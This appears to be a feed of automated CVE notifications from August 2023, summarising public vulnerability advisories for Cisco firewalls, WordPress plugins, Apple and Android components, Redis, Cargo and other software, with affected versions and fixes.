| 2023-08-15 17:58:37 |
🚨 CVE-2019-1693A vulnerability in the WebVPN service of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper management of authenticated sessions in the WebVPN portal. An attacker could exploit this vulnerability by authenticating with valid credentials and accessing a specific URL in the WebVPN portal. A successful exploit could allow the attacker to cause the device to reload, resulting in a temporary DoS condition.🎖@cveNotify |
|
| 2023-08-15 17:58:36 |
🚨 CVE-2019-1697A vulnerability in the implementation of the Lightweight Directory Access Protocol (LDAP) feature in Cisco Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition. The vulnerabilities are due to the improper parsing of LDAP packets sent to an affected device. An attacker could exploit these vulnerabilities by sending a crafted LDAP packet, using Basic Encoding Rules (BER), to be processed by an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition.🎖@cveNotify |
|
| 2023-08-15 17:58:35 |
🚨 CVE-2019-1695A vulnerability in the detection engine of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, adjacent attacker to send data directly to the kernel of an affected device. The vulnerability exists because the software improperly filters Ethernet frames sent to an affected device. An attacker could exploit this vulnerability by sending crafted packets to the management interface of an affected device. A successful exploit could allow the attacker to bypass the Layer 2 (L2) filters and send data directly to the kernel of the affected device. A malicious frame successfully delivered would make the target device generate a specific syslog entry.🎖@cveNotify |
|
| 2023-08-15 17:58:33 |
🚨 CVE-2020-3166A vulnerability in the CLI of Cisco FXOS Software could allow an authenticated, local attacker to read or write arbitrary files on the underlying operating system (OS). The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by including crafted arguments to a specific CLI command. A successful exploit could allow the attacker to read or write to arbitrary files on the underlying OS.🎖@cveNotify |
|
| 2023-08-15 17:58:32 |
🚨 CVE-2018-15388A vulnerability in the WebVPN login process of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause increased CPU utilization on an affected device. The vulnerability is due to excessive processing load for existing WebVPN login operations. An attacker could exploit this vulnerability by sending multiple WebVPN login requests to the device. A successful exploit could allow the attacker to increase CPU load on the device, resulting in a denial of service (DoS) condition.🎖@cveNotify |
|
| 2023-08-15 17:58:31 |
🚨 CVE-2020-3167A vulnerability in the CLI of Cisco FXOS Software and Cisco UCS Manager Software could allow an authenticated, local attacker to execute arbitrary commands on the underlying operating system (OS). The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by including crafted arguments to specific commands. A successful exploit could allow the attacker to execute arbitrary commands on the underlying OS with the privileges of the currently logged-in user for all affected platforms excluding Cisco UCS 6400 Series Fabric Interconnects. On Cisco UCS 6400 Series Fabric Interconnects, the injected commands are executed with root privileges.🎖@cveNotify |
|
| 2023-08-15 17:58:30 |
🚨 CVE-2018-15454A vulnerability in the Session Initiation Protocol (SIP) inspection engine of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload or trigger high CPU, resulting in a denial of service (DoS) condition. The vulnerability is due to improper handling of SIP traffic. An attacker could exploit this vulnerability by sending SIP requests designed to specifically trigger this issue at a high rate across an affected device. Software updates that address this vulnerability are not yet available.🎖@cveNotify |
|
| 2023-08-15 17:58:29 |
🚨 CVE-2019-1694A vulnerability in the TCP processing engine of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition. The vulnerability is due to the improper handling of TCP traffic. An attacker could exploit this vulnerability by sending a specific sequence of packets at a high rate through an affected device. A successful exploit could allow the attacker to temporarily disrupt traffic through the device while it reboots.🎖@cveNotify |
|
| 2023-08-15 17:58:28 |
🚨 CVE-2019-1713A vulnerability in the web-based management interface of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system. The vulnerability is due to insufficient CSRF protections for the web-based management interface on an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user. If the user has administrative privileges, the attacker could alter the configuration of, extract information from, or reload an affected device.🎖@cveNotify |
|
| 2023-08-15 17:58:27 |
🚨 CVE-2019-15256A vulnerability in the Internet Key Exchange version 1 (IKEv1) feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition. The vulnerability is due to improper management of system memory. An attacker could exploit this vulnerability by sending malicious IKEv1 traffic to an affected device. The attacker does not need valid credentials to authenticate the VPN session, nor does the attacker's source address need to match a peer statement in the crypto map applied to the ingress interface of the affected device. An exploit could allow the attacker to exhaust system memory resources, leading to a reload of an affected device.🎖@cveNotify |
|
| 2023-08-15 17:58:26 |
🚨 CVE-2018-15465A vulnerability in the authorization subsystem of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, but unprivileged (levels 0 and 1), remote attacker to perform privileged actions by using the web management interface. The vulnerability is due to improper validation of user privileges when using the web management interface. An attacker could exploit this vulnerability by sending specific HTTP requests via HTTPS to an affected device as an unprivileged user. An exploit could allow the attacker to retrieve files (including the running configuration) from the device or to upload and replace software images on the device.🎖@cveNotify |
|
| 2023-08-15 17:58:25 |
🚨 CVE-2018-15383A vulnerability in the cryptographic hardware accelerator driver of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a temporary denial of service (DoS) condition. The vulnerability exists because the affected devices have a limited amount of Direct Memory Access (DMA) memory and the affected software improperly handles resources in low-memory conditions. An attacker could exploit this vulnerability by sending a sustained, high rate of malicious traffic to an affected device to exhaust memory on the device. A successful exploit could allow the attacker to exhaust DMA memory on the affected device, which could cause the device to reload and result in a temporary DoS condition.🎖@cveNotify |
|
| 2023-08-15 17:58:24 |
🚨 CVE-2018-15397A vulnerability in the implementation of Traffic Flow Confidentiality (TFC) over IPsec functionality in Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to restart unexpectedly, resulting in a denial of service (DoS) condition. The vulnerability is due to an error that may occur if the affected software renegotiates the encryption key for an IPsec tunnel when certain TFC traffic is in flight. An attacker could exploit this vulnerability by sending a malicious stream of TFC traffic through an established IPsec tunnel on an affected device. A successful exploit could allow the attacker to cause a daemon process on the affected device to crash, which could cause the device to crash and result in a DoS condition.🎖@cveNotify |
|
| 2023-08-15 13:58:14 |
🚨 CVE-2023-2916The InfiniteWP Client plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 1.11.1 via the 'admin_notice' function. This can allow authenticated attackers with subscriber-level permissions or above to extract sensitive data including configuration. It can only be exploited if the plugin has not been configured yet. If combined with another arbitrary plugin installation and activation vulnerability, it may be possible to connect a site to InfiniteWP which would make remote management possible and allow for elevation of privileges.🎖@cveNotify |
|
| 2023-08-15 13:58:13 |
🚨 CVE-2023-4308The User Submitted Posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘user-submitted-content’ parameter in versions up to, and including, 20230809 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-08-15 06:58:15 |
🚨 CVE-2023-36482An issue was discovered in Samsung NFC S3NRN4V, S3NSN4V, S3NSEN4, SEN82AB, and S3NRN82. A buffer copy without checking its input size can cause an NFC service restart.🎖@cveNotify |
|
| 2023-08-15 00:58:31 |
🚨 CVE-2022-46706A type confusion issue was addressed with improved state handling. This issue is fixed in Security Update 2022-003 Catalina, macOS Monterey 12.3, macOS Big Sur 11.6.5. An application may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-08-15 00:58:30 |
🚨 CVE-2022-46722A logic issue was addressed with improved checks. This issue is fixed in macOS Ventura 13. An app may be able to modify protected parts of the file system.🎖@cveNotify |
|
| 2023-08-15 00:58:29 |
🚨 CVE-2022-46725A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation. This issue is fixed in iOS 16.4 and iPadOS 16.4. Visiting a malicious website may lead to address bar spoofing.🎖@cveNotify |
|
| 2023-08-15 00:58:25 |
🚨 CVE-2023-27939An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Ventura 13.3. Processing an image may result in disclosure of process memory.🎖@cveNotify |
|
| 2023-08-15 00:58:24 |
🚨 CVE-2023-27947An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Ventura 13.3. Processing an image may result in disclosure of process memory.🎖@cveNotify |
|
| 2023-08-15 00:58:23 |
🚨 CVE-2023-28179The issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.3. Processing a maliciously crafted AppleScript binary may result in unexpected app termination or disclosure of process memory.🎖@cveNotify |
|
| 2023-08-15 00:58:19 |
🚨 CVE-2023-28198A use-after-free issue was addressed with improved memory management. This issue is fixed in iOS 16.4 and iPadOS 16.4, macOS Ventura 13.3. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-08-15 00:58:18 |
🚨 CVE-2023-32358A type confusion issue was addressed with improved checks. This issue is fixed in iOS 16.4 and iPadOS 16.4, macOS Ventura 13.3. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-08-15 00:58:17 |
🚨 CVE-2023-21230In onAccessPointChanged of AccessPointPreference.java, there is a possible way for unprivileged apps to receive a broadcast about WiFi access point change and its BSSID or SSID due to a precondition check failure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-08-15 00:58:13 |
🚨 CVE-2023-21232In multiple locations, there is a possible way to retrieve sensor data without permissions due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-08-15 00:58:12 |
🚨 CVE-2023-21235In onCreate of LockSettingsActivity.java, there is a possible way set a new lockscreen PIN without entering the existing PIN due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-08-14 23:58:34 |
🚨 CVE-2023-21268In update of MmsProvider.java, there is a possible way to change directory permissions due to a path traversal error. This could lead to local denial of service of SIM recognition with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-08-14 23:58:33 |
🚨 CVE-2023-21269In startActivityInner of ActivityStarter.java, there is a possible way to launch an activity into PiP mode from the background due to BAL bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-08-14 23:58:32 |
🚨 CVE-2023-38687Svelecte is a flexible autocomplete/select component written in Svelte. Svelecte item names are rendered as raw HTML with no escaping. This allows the injection of arbitrary HTML into the Svelecte dropdown. This can be exploited to execute arbitrary JavaScript whenever a Svelecte dropdown is opened. Item names given to Svelecte appear to be directly rendered as HTML by the default item renderer. This means that any HTML tags in the name are rendered as HTML elements not as text. Note that the custom item renderer shown in https://mskocik.github.io/svelecte/#item-rendering is also vulnerable to the same exploit. Any site that uses Svelecte with dynamically created items either from an external source or from user-created content could be vulnerable to an XSS attack (execution of untrusted JavaScript), clickjacking or any other attack that can be performed with arbitrary HTML injection. The actual impact of this vulnerability for a specific application depends on how trustworthy the sources that provide Svelecte items are and the steps that the application has taken to mitigate XSS attacks. XSS attacks using this vulnerability are mostly mitigated by a Content Security Policy that blocks inline JavaScript. This issue has been addressed in version 3.16.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-08-14 23:58:31 |
🚨 CVE-2023-39827Tenda A18 V15.13.07.09 was discovered to contain a stack overflow via the rule_info parameter in the formAddMacfilterRule function.🎖@cveNotify |
|
| 2023-08-14 23:58:30 |
🚨 CVE-2023-39828Tenda A18 V15.13.07.09 was discovered to contain a stack overflow via the security parameter in the formWifiBasicSet function.🎖@cveNotify |
|
| 2023-08-14 23:58:28 |
🚨 CVE-2023-39829Tenda A18 V15.13.07.09 was discovered to contain a stack overflow via the wpapsk_crypto2_4g parameter in the fromSetWirelessRepeat function.🎖@cveNotify |
|
| 2023-08-14 23:58:27 |
🚨 CVE-2023-39950efibootguard is a simple UEFI boot loader with support for safely switching between current and updated partition sets. Insufficient or missing validation and sanitization of input from untrustworthy bootloader environment files can cause crashes and probably also code injections into `bg_setenv`) or programs using `libebgenv`. This is triggered when the affected components try to modify a manipulated environment, in particular its user variables. Furthermore, `bg_printenv` may crash over invalid read accesses or report invalid results. Not affected by this issue is EFI Boot Guard's bootloader EFI binary. EFI Boot Guard release v0.15 contains required patches to sanitize and validate the bootloader environment prior to processing it in userspace. Its library and tools should be updated, so should programs statically linked against it. An update of the bootloader EFI executable is not required. The only way to prevent the issue with an unpatched EFI Boot Guard version is to avoid accesses to user variables, specifically modifications to them.🎖@cveNotify |
|
| 2023-08-14 23:58:26 |
🚨 CVE-2023-40013SVG Loader is a javascript library that fetches SVGs using XMLHttpRequests and injects the SVG code in the tag's place. According to the docs, svg-loader will strip all JS code before injecting the SVG file for security reasons but the input sanitization logic is not sufficient and can be trivially bypassed. This allows an attacker to craft a malicious SVG which can result in Cross-site Scripting (XSS). When trying to sanitize the svg the lib removes event attributes such as `onmouseover`, `onclick` but the list of events is not exhaustive. Any website which uses external-svg-loader and allows its users to provide svg src, upload svg files would be susceptible to stored XSS attack. This issue has been addressed in commit `d3562fc08` which is included in releases from 1.6.9. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-08-14 23:58:25 |
🚨 CVE-2023-40020PrivateUploader is an open source image hosting server written in Vue and TypeScript. In affected versions `app/routes/v3/admin.controller.ts` did not correctly verify whether the user was an administrator (High Level) or moderator (Low Level) causing the request to continue processing. The response would be a 403 with ADMIN_ONLY, however, next() would call leading to any updates/changes in the route to process. This issue has been addressed in version 3.2.49. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-08-14 23:58:24 |
🚨 CVE-2022-4953The Elementor Website Builder WordPress plugin before 3.5.5 does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.🎖@cveNotify |
|
| 2023-08-14 23:58:22 |
🚨 CVE-2023-2606The WP Brutal AI WordPress plugin before 2.06 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-08-14 23:58:21 |
🚨 CVE-2023-2802The Ultimate Addons for Contact Form 7 WordPress plugin before 3.1.29 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-08-14 23:58:20 |
🚨 CVE-2023-2803The Ultimate Addons for Contact Form 7 WordPress plugin before 3.1.29 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.🎖@cveNotify |
|
| 2023-08-14 23:58:19 |
🚨 CVE-2023-3328The Custom Field For WP Job Manager WordPress plugin before 1.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-08-14 23:58:18 |
🚨 CVE-2023-3435The User Activity Log WordPress plugin before 1.6.5 does not correctly sanitise and escape several parameters before using it in a SQL statement as part of its exportation feature, allowing unauthenticated attackers to conduct SQL injection attacks.🎖@cveNotify |
|
| 2023-08-14 23:58:17 |
🚨 CVE-2023-3601The Simple Author Box WordPress plugin before 2.52 does not verify a user ID before outputting information about that user, leading to arbitrary user information disclosure to users with a role as low as Contributor.🎖@cveNotify |
|
| 2023-08-14 23:58:16 |
🚨 CVE-2023-3645The Contact Form Builder by Bit Form WordPress plugin before 2.2.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-08-14 23:58:15 |
🚨 CVE-2023-3721The WP-EMail WordPress plugin before 2.69.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-08-14 23:58:14 |
🚨 CVE-2023-40023yaklang is a programming language designed for cybersecurity. The Yak Engine has been found to contain a local file inclusion (LFI) vulnerability. This vulnerability allows attackers to include files from the server's local file system through the web application. When exploited, this can lead to the unintended exposure of sensitive data, potential remote code execution, or other security breaches. Users utilizing versions of the Yak Engine prior to 1.2.4-sp1 are impacted. This vulnerability has been patched in version 1.2.4-sp1. Users are advised to upgrade. users unable to upgrade may avoid exposing vulnerable versions to untrusted input and to closely monitor any unexpected server behavior until they can upgrade.🎖@cveNotify |
|
| 2023-08-14 23:58:12 |
🚨 CVE-2023-40024ScanCode.io is a server to script and automate software composition analysis pipelines. In the `/license/` endpoint, the detailed view key is not properly validated and sanitized, which can result in a potential cross-site scripting (XSS) vulnerability when attempting to access a detailed license view that does not exist. Attackers can exploit this vulnerability to inject malicious scripts into the response generated by the `license_details_view` function. When unsuspecting users visit the page, their browsers will execute the injected scripts, leading to unauthorized actions, session hijacking, or stealing sensitive information. This issue has been addressed in release `32.5.2`. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-08-14 20:58:32 |
🚨 CVE-2023-3526In PHOENIX CONTACTs TC ROUTER and TC CLOUD CLIENT in versions prior to 2.07.2 as well as CLOUD CLIENT 1101T-TX/TX prior to 2.06.10 an unauthenticated remote attacker could use a reflective XSS within the license viewer page of the devices in order to execute code in the context of the user's browser.🎖@cveNotify |
|
| 2023-08-14 20:58:31 |
🚨 CVE-2023-3569In PHOENIX CONTACTs TC ROUTER and TC CLOUD CLIENT in versions prior to 2.07.2 as well as CLOUD CLIENT 1101T-TX/TX prior to 2.06.10 an authenticated remote attacker with admin privileges could upload a crafted XML file which causes a denial-of-service.🎖@cveNotify |
|
| 2023-08-14 20:58:30 |
🚨 CVE-2023-28530IBM Cognos Analytics 11.1 and 11.2 is vulnerable to stored cross-site scripting, caused by improper validation of SVG Files in Custom Visualizations. A remote attacker could exploit this vulnerability to execute scripts in a victim's Web browser within the security context of the hosting Web site. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. IBM X-Force ID: 251214.🎖@cveNotify |
|
| 2023-08-14 20:58:29 |
🚨 CVE-2023-34034Using "**" as a pattern in Spring Security configuration for WebFlux creates a mismatch in pattern matching between Spring Security and Spring WebFlux, and the potential for a security bypass.🎖@cveNotify |
|
| 2023-08-14 20:58:26 |
🚨 CVE-2023-34330AMI SPx contains a vulnerability in the BMC where a user may inject code which could be executed via a Dynamic Redfish Extension interface. A successful exploit of this vulnerability may lead to a loss of confidentiality, integrity, and availability. 🎖@cveNotify |
|
| 2023-08-14 20:58:25 |
🚨 CVE-2023-34329AMI MegaRAC SPx12 contains a vulnerability in BMC where a User may cause an authentication bypass by spoofing the HTTP header. A successful exploit of this vulnerability may lead to loss of confidentiality, integrity, and availability.🎖@cveNotify |
|
| 2023-08-14 20:58:24 |
🚨 CVE-2022-24834Redis is an in-memory database that persists on disk. A specially crafted Lua script executing in Redis can trigger a heap overflow in the cjson library, and result with heap corruption and potentially remote code execution. The problem exists in all versions of Redis with Lua scripting support, starting from 2.6, and affects only authenticated and authorized users. The problem is fixed in versions 7.0.12, 6.2.13, and 6.0.20.🎖@cveNotify |
|
| 2023-08-14 20:58:23 |
🚨 CVE-2023-29406The HTTP/1 client does not fully validate the contents of the Host header. A maliciously crafted Host header can inject additional headers or entire requests. With fix, the HTTP/1 client now refuses to send requests containing an invalid Request.Host or Request.URL.Host value.🎖@cveNotify |
|
| 2023-08-14 20:58:20 |
🚨 CVE-2023-36824Redis is an in-memory database that persists on disk. In Redit 7.0 prior to 7.0.12, extracting key names from a command and a list of arguments may, in some cases, trigger a heap overflow and result in reading random heap memory, heap corruption and potentially remote code execution. Several scenarios that may lead to authenticated users executing a specially crafted `COMMAND GETKEYS` or `COMMAND GETKEYSANDFLAGS`and authenticated users who were set with ACL rules that match key names, executing a specially crafted command that refers to a variadic list of key names. The vulnerability is patched in Redis 7.0.12.🎖@cveNotify |
|
| 2023-08-14 20:58:19 |
🚨 CVE-2023-28953IBM Cognos Analytics on Cloud Pak for Data 4.0 could allow an attacker to make system calls that might compromise the security of the containers due to misconfigured security context. IBM X-Force ID: 251465.🎖@cveNotify |
|
| 2023-08-14 20:58:18 |
🚨 CVE-2023-32748The Linux DVS server component of Mitel MiVoice Connect through 19.3 SP2 (22.24.1500.0) could allow an unauthenticated attacker with internal network access to execute arbitrary scripts due to improper access control.🎖@cveNotify |
|
| 2023-08-14 20:58:14 |
🚨 CVE-2023-38741IBM TXSeries for Multiplatforms 8.1, 8.2, and 9.1 is vulnerable to a denial of service, caused by improper enforcement of the timeout on individual read operations. By conducting a slowloris-type attacks, a remote attacker could exploit this vulnerability to cause a denial of service. IBM X-Force ID: 262905.🎖@cveNotify |
|
| 2023-08-14 20:58:13 |
🚨 CVE-2023-40312Multiple reflected XSS were found on different JSP files with unsanitized parameters in OpenMNS Horizon 31.0.8 and versions earlier than 32.0.2 on multiple platforms that an attacker can modify to craft a malicious XSS payload. The solution is to upgrade to Meridian 2023.1.6, 2022.1.19, 2021.1.30, 2020.1.38 or Horizon 32.0.2 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet. OpenNMS thanks Jordi Miralles Comins for reporting this issue.🎖@cveNotify |
|
| 2023-08-14 20:58:12 |
🚨 CVE-2023-40360QEMU through 8.0.4 accesses a NULL pointer in nvme_directive_receive in hw/nvme/ctrl.c because there is no check for whether an endurance group is configured before checking whether Flexible Data Placement is enabled.🎖@cveNotify |
|
| 2023-08-14 18:58:23 |
🚨 CVE-2022-36113Cargo is a package manager for the rust programming language. After a package is downloaded, Cargo extracts its source code in the ~/.cargo folder on disk, making it available to the Rust projects it builds. To record when an extraction is successful, Cargo writes "ok" to the .cargo-ok file at the root of the extracted source code once it extracted all the files. It was discovered that Cargo allowed packages to contain a .cargo-ok symbolic link, which Cargo would extract. Then, when Cargo attempted to write "ok" into .cargo-ok, it would actually replace the first two bytes of the file the symlink pointed to with ok. This would allow an attacker to corrupt one file on the machine using Cargo to extract the package. Note that by design Cargo allows code execution at build time, due to build scripts and procedural macros. The vulnerabilities in this advisory allow performing a subset of the possible damage in a harder to track down way. Your dependencies must still be trusted if you want to be protected from attacks, as it's possible to perform the same attacks with build scripts and procedural macros. The vulnerability is present in all versions of Cargo. Rust 1.64, to be released on September 22nd, will include a fix for it. Since the vulnerability is just a more limited way to accomplish what a malicious build scripts or procedural macros can do, we decided not to publish Rust point releases backporting the security fix. Patch files are available for Rust 1.63.0 are available in the wg-security-response repository for people building their own toolchain.Mitigations We recommend users of alternate registries to exercise care in which package they download, by only including trusted dependencies in their projects. Please note that even with these vulnerabilities fixed, by design Cargo allows arbitrary code execution at build time thanks to build scripts and procedural macros: a malicious dependency will be able to cause damage regardless of these vulnerabilities. crates.io implemented server-side checks to reject these kinds of packages years ago, and there are no packages on crates.io exploiting these vulnerabilities. crates.io users still need to exercise care in choosing their dependencies though, as remote code execution is allowed by design there as well.🎖@cveNotify |
|
| 2023-08-14 18:58:20 |
🚨 CVE-2022-36114Cargo is a package manager for the rust programming language. It was discovered that Cargo did not limit the amount of data extracted from compressed archives. An attacker could upload to an alternate registry a specially crafted package that extracts way more data than its size (also known as a "zip bomb"), exhausting the disk space on the machine using Cargo to download the package. Note that by design Cargo allows code execution at build time, due to build scripts and procedural macros. The vulnerabilities in this advisory allow performing a subset of the possible damage in a harder to track down way. Your dependencies must still be trusted if you want to be protected from attacks, as it's possible to perform the same attacks with build scripts and procedural macros. The vulnerability is present in all versions of Cargo. Rust 1.64, to be released on September 22nd, will include a fix for it. Since the vulnerability is just a more limited way to accomplish what a malicious build scripts or procedural macros can do, we decided not to publish Rust point releases backporting the security fix. Patch files are available for Rust 1.63.0 are available in the wg-security-response repository for people building their own toolchain. We recommend users of alternate registries to excercise care in which package they download, by only including trusted dependencies in their projects. Please note that even with these vulnerabilities fixed, by design Cargo allows arbitrary code execution at build time thanks to build scripts and procedural macros: a malicious dependency will be able to cause damage regardless of these vulnerabilities. crates.io implemented server-side checks to reject these kinds of packages years ago, and there are no packages on crates.io exploiting these vulnerabilities. crates.io users still need to excercise care in choosing their dependencies though, as the same concerns about build scripts and procedural macros apply here.🎖@cveNotify |
|
| 2023-08-14 18:58:19 |
🚨 CVE-2023-4009In MongoDB Ops Manager v5.0 prior to 5.0.22 and v6.0 prior to 6.0.17 it is possible for an authenticated user with project owner or project user admin access to generate an API key with the privileges of org owner resulting in privilege escalation.🎖@cveNotify |
|
| 2023-08-14 18:58:18 |
🚨 CVE-2023-30682Improper access control in Telecom prior to SMR Aug-2023 Release 1 allows local attackers to call silenceRinger API without permission.🎖@cveNotify |
|
| 2023-08-14 18:58:14 |
🚨 CVE-2023-30684Improper access control in Samsung Telecom prior to SMR Aug-2023 Release 1 allows local attackers to call acceptRingingCall API without permission.🎖@cveNotify |
|
| 2023-08-14 18:58:13 |
🚨 CVE-2023-30687Out-of-bounds Write in RmtUimApdu of libsec-ril prior to SMR Aug-2023 Release 1 allows local attacker to execute arbitrary code.🎖@cveNotify |
|
| 2023-08-14 16:58:33 |
🚨 CVE-2023-31041An issue was discovered in SysPasswordDxe in Insyde InsydeH2O with kernel 5.0 through 5.5. System password information could optionally be stored in cleartext, which might lead to possible information disclosure.🎖@cveNotify |
|
| 2023-08-14 16:58:32 |
🚨 CVE-2023-30688Out-of-bounds Write in MakeUiccAuthForOem of libsec-ril prior to SMR Aug-2023 Release 1 allows local attacker to execute arbitrary code.🎖@cveNotify |
|
| 2023-08-14 16:58:31 |
🚨 CVE-2023-30679Improper access control in HDCP trustlet prior to SMR Aug-2023 Release 1 allows local attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-08-14 16:58:30 |
🚨 CVE-2023-38212Adobe Dimension version 3.4.9 is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-08-14 16:58:26 |
🚨 CVE-2023-33250The Linux kernel 6.3 has a use-after-free in iopt_unmap_iova_range in drivers/iommu/iommufd/io_pagetable.c.🎖@cveNotify |
|
| 2023-08-14 16:58:25 |
🚨 CVE-2023-4242The FULL - Customer plugin for WordPress is vulnerable to Information Disclosure via the /health REST route in versions up to, and including, 2.2.3 due to improper authorization. This allows authenticated attackers with subscriber-level permissions and above to obtain sensitive information about the site configuration as disclosed by the WordPress health check.🎖@cveNotify |
|
| 2023-08-14 16:58:24 |
🚨 CVE-2020-36023An issue was discovered in freedesktop poppler version 20.12.1, allows remote attackers to cause a denial of service (DoS) via crafted .pdf file to FoFiType1C::cvtGlyph function.🎖@cveNotify |
|
| 2023-08-14 16:58:20 |
🚨 CVE-2023-36344An issue in Diebold Nixdorf Vynamic View Console v.5.3.1 and before allows a local attacker to execute arbitrary code via not restricting the search path for required DLLs and not verifying the signature.🎖@cveNotify |
|
| 2023-08-14 16:58:19 |
🚨 CVE-2023-4219A vulnerability was found in SourceCodester Doctors Appointment System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file login.php. The manipulation of the argument useremail leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-236365 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-08-14 16:58:18 |
🚨 CVE-2023-37728IceWarp v10.2.1 was discovered to contain cross-site scripting (XSS) vulnerability via the color parameter.🎖@cveNotify |
|
| 2023-08-14 16:58:14 |
🚨 CVE-2023-1119The WP-Optimize WordPress plugin before 3.2.13, SrbTransLatin WordPress plugin before 2.4.1 use a third-party library that removes the escaping on some HTML characters, leading to a cross-site scripting vulnerability.🎖@cveNotify |
|
| 2023-08-14 16:58:13 |
🚨 CVE-2022-31595SAP Financial Consolidation - version 1010,?does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges.🎖@cveNotify |
|
| 2023-08-14 16:58:12 |
🚨 CVE-2023-39006The Crash Reporter (crash_reporter.php) component of OPNsense before 23.7 mishandles input sanitization.🎖@cveNotify |
|
| 2023-08-14 15:58:36 |
🚨 CVE-2022-22528SAP Adaptive Server Enterprise (ASE) - version 16.0, installation makes an entry in the system PATH environment variable in Windows platform which, under certain conditions, allows a Standard User to execute malicious Windows binaries which may lead to privilege escalation on the local system. The issue is with the ASE installer and does not impact other ASE binaries.🎖@cveNotify |
|
| 2023-08-14 15:58:35 |
🚨 CVE-2023-3160The vulnerability potentially allows an attacker to misuse ESET’s file operations during the module update to delete or move files without having proper permissions.🎖@cveNotify |
|
| 2023-08-14 15:58:34 |
🚨 CVE-2023-4321Cross-site Scripting (XSS) - Stored in GitHub repository cockpit-hq/cockpit prior to 2.4.3.🎖@cveNotify |
|
| 2023-08-14 15:58:30 |
